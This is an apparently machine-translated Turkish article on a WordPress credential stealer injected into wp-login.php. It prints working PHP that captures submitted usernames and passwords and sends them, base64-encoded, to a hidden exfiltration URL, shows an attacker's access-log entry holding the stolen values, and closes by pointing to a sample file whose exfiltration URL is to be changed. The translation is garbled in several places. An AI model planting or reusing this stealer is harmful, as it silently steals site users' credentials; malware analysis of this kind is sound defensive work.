Giriş hırsızları , virüslü bir web sitesinde kullanıcı giriş verilerini sessizce yakalamak için kullanılan bir web kötü amaçlı yazılım biçimidir.

wp-login.php enjeksiyonu 

wp-login.php , web sitesine gönderilen POST isteklerinde yer alan kullanıcı adını ve şifreyi çalmaya çalışan biri için doğal bir seçimdir .

neden ?

Çünkü wp-login.php dosyası, kurban Login'e tıkladığında kullanıcı adı (log) ve şifre (pwd) verilerini içeren POST isteklerini alır .

wordpress
Her iki isteği de görebilmemiz için web sunucusunun kendisinde yakalanan paketler

PHP Sızıntısı 

PHP barındırma sunucusunda çalıştığı için - kötü amaçlı yazılım barındırma sunucusundan doğrudan saldırganın kendi web sitesine sızabilir, bu nedenle Sucuri SiteCheck gibi web sitesi tarayıcılarında veya kurbanın sunucuya yönelik isteklerinde (örneğin geliştirme araçları ağ sekmesi) hiçbir şey görünmez . . Her şey (müşteri) tarafında normal görünüyor.

curlAşağıdaki PHP kod alıntısında, esas olarak isteği göndermek için kullanılan yakalama ve sızma kodunu görebiliriz :

$ccc_url =
    base64_decode("aHR0cDovL2xvY2FsaG9zdC9wYXNzLnBocD9hZG1pbmlwPQ==") .
    base64_encode(get__ip()) .
    "&host=" .
    base64_encode($url) .
    "&name=" .
    base64_encode($_POST['log']) .
    "&password=" .
    base64_encode($_POST['pwd']);
$ccc = file_get_contents($ccc_url);
if (empty($ccc)) {
    function get_pass_Html($url)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 3);
        curl_exec($ch);
        curl_close($ch);
        return true;
    }
    get_pass_Html($ccc_url);
}
kopyala

Dışarı sızma URL dosyası mevcut olmasa bile - saldırgan, yalnızca sunucularının erişim günlüğünü görüntüleyerek sızdırılan tüm bilgileri almaya devam edebilir.

İşte buna bir örnek:

::1 - - [09/Jun/2021:01:01:19 -0500] "GET /pass.php?adminip=MC4wLjAuMA==&host=aHR0cDovL2xvY2FsaG9zdC93b3JkcHJlc3Mvd3AtbG9naW4ucGhwLWh0dHA6Ly9sb2NhbGhvc3Qvd29yZHByZXNzL3dwLWxvZ2luLnBocD9yZWRpcmVjdF90bz1odHRwJTNBJTJGJTJGbG9jYWxob3N0JTJGd29yZHByZXNzJTJGd3AtYWRtaW4lMkYmcmVhdXRoPTE=&name=YWRtaW4=&password=YWRtaW4= HTTP/1.1" 404 432 "-" "-"

Bu, a veya standart 403yerine bir yanıtla sonuçlandığında da geçerli olacaktır .404200

Paylaşılan web barındırıcılarının çoğu, bu isteklerin dışarı çıkmasını engellemeyecek veya engellemeyecek - bu nedenle, basit olsa da, ortalama WordPress web sitesi web barındırıcısı için işe yarar.

 

Örnek 

Enjeksiyon satırlarda bulunur - olarak ayarlanmasını istemiyorsanız, 1342-1356depolanan dışa aktarma URL'sini başka bir şeye değiştirin.$ccc_urllocalhost